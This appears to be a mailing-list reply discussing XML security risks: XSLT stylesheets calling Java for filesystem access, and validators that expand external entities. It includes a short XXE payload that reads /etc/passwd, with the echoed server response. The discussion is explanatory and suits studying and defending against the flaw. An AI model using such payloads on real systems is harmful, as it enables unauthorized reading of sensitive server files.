[
Lists Home |
Date Index |
Thread Index
]
Michael Kay wrote,
> I see that David's talk mentions the dangers of referring to external
> XSLT stylesheets. Until recently the W3C site provided a servlet
> which would run an XSLT transformation using a user-specified source
> document and stylesheet. By calling external Java methods from the
> stylesheet, you had total access to files on the web server.
>
> Although W3C have patched their servlet to disallow Java method
> calls, I suspect many others are still doing this.
I'm inclined to say that all bets are off with XSLT: it's code, and if
you don't trust it you shouldn't execute it.
It's cases where there's no code as such, so no apparent danger, which
worry me more. Nevertheless, your example of filesystem access is
interesting. Going back to my earlier example of a validator which
echos back the input document with external entities expanded, I wonder
if something like the following would be a possible exploit on a
recklessly configured system,
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY secret SYSTEM "file://localhost/etc/passwd">
]>
<bar>&secret;</bar>
returning,
HTTP/1.1 200 OK
Content-Type: text/plain
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY secret SYSTEM "file://localhost/etc/passwd">
]>
<bar>... contents of /etc/passwd here ...</bar>
^^^
Validity constraint: element "bar" not permitted here.
Cheers,
Miles
|